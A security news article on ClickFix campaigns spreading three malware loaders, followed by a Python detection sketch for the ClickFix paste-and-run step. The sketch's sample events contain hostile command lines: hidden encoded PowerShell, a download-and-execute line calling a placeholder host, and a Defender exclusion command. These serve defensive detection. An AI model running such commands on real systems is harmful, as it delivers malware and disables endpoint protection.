ClickFix Campaigns Deploy Three New Loader Families
Cybersecurity researchers have identified multiple active ClickFix campaigns distributing three distinct malware loaders: BabaDeda Loader, Lorem Ipsum Loader, and Potemkin. These campaigns were reported independently by Morphisec, BlueVoyant, and Huntress. The BabaDeda Loader, first observed in April 2026, targets education and financial organizations. It uses ClickFix social engineering lures to trick users into running PowerShell commands that deliver the loader. This loader then drops information stealers and remote access trojans by combining techniques like hidden PowerShell, in-memory shellcode, DLL side-loading, and external payload storage. The loader profiles the host, avoids Russian and Belarusian systems, and performs security product checks before injecting the main payload into a trusted Windows process such as svchost.exe.
How the Lorem Ipsum and Potemkin Loaders Operate
The Lorem Ipsum Loader campaign uses at least five compromised WordPress sites as starting points. These sites span architecture, legal services, and construction technology. Attackers present fake Edge browser security update lures to get users to run commands that download a ZIP file and an outdated Node.js version, which is then used to execute JavaScript payloads. The JavaScript drops a batch script that sets up DLL side-loading persistence to decode the loader. The loader then retrieves a backdoor from attacker-controlled profiles on social networking platforms. Separately, the Potemkin campaign installs an MSI package that drops the loader via an HTML Application payload. Potemkin uses a domain generation algorithm to find its command-and-control server and reflectively loads modules in memory. It supports components for lifecycle management, victim identification, and task polling, and uses a custom byte cipher to protect communications.
Impact and Scope
These ClickFix campaigns demonstrate an evolution in loader frameworks, which are becoming increasingly modular by separating delivery, storage, execution, and payload deployment into distinct components. The Lorem Ipsum ecosystem is attributed with high confidence to the financially motivated threat actor Vanilla Tempest, known for deploying ransomware families like Rhysida and BlackCat. In the Potemkin campaign, attackers have been observed engaging in hands-on-keyboard activity to configure Microsoft Defender exclusions, deploy reverse SOCKS tunnels, and spread laterally to domain controllers. ClickFix remains an effective technique across Windows and macOS, exploiting the human tendency to follow authoritative instructions. Researchers note these attacks illustrate how adversaries rapidly adapt to alternative delivery models despite law enforcement disruptions.
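The two observable artifacts the report describes on the endpoint are a user-launched hidden PowerShell command (the ClickFix paste-and-run step) and later Add-MpPreference calls that add Defender exclusions. The following detection sketch is an added example, not code from any of the cited vendors; it runs regex indicators over constructed process-creation records and assumes, as a simplification, that the ClickFix one-liner is spawned with explorer.exe as its parent (the Run dialog) and that the record carries only the parent image and command line.

```python
import re

# Constructed sample process-creation records (parent image, command line);
# they are not from the article. The hidden/encoded PowerShell lines model the
# ClickFix paste-and-run step; the Add-MpPreference line models the
# hands-on-keyboard Defender-exclusion activity reported for Potemkin.
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe -w hidden -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ("explorer.exe", 'powershell.exe -NoProfile -WindowStyle Hidden -c "iwr http://example.invalid/x|iex"'),
    ("cmd.exe", 'powershell.exe -Command "Add-MpPreference -ExclusionPath C:\\Users\\Public"'),
    ("services.exe", "svchost.exe -k netsvcs -p"),
    ("explorer.exe", "powershell.exe Get-ChildItem C:\\Temp"),
]

# Indicator name -> pattern. Matching is case-insensitive because PowerShell
# accepts abbreviated and mixed-case switches (-w / -WindowStyle, -enc / -EncodedCommand).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_and_exec": re.compile(r"(?:iwr|invoke-webrequest|downloadstring|curl)\b.*\b(?:iex|invoke-expression)", re.I),
    "defender_exclusion": re.compile(r"add-mppreference\s+-exclusion(?:path|process|extension)", re.I),
}


def classify(parent, cmdline):
    """Return the indicator names matched by one process-creation event (empty if benign)."""
    if "powershell" not in cmdline.lower():
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    # PowerShell launched from explorer.exe (assumed parent of a Run-dialog paste)
    # that also hides its window or carries an encoded/download-and-run command
    # is the ClickFix pattern; flag it separately so analysts can triage it first.
    if hits and parent.lower() == "explorer.exe":
        hits.append("clickfix_parent")
    return hits


def scan(events):
    """Return {command line: [indicators]} for every event that matched at least one indicator."""
    findings = {}
    for parent, cmdline in events:
        hits = classify(parent, cmdline)
        if hits:
            findings[cmdline] = hits
    return findings
```

A real deployment would read parent and command line from Sysmon Event ID 1 or an EDR process-creation feed rather than the constructed tuples above, and would tune the encoded-command threshold to its own baseline.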
Source: The Hacker News

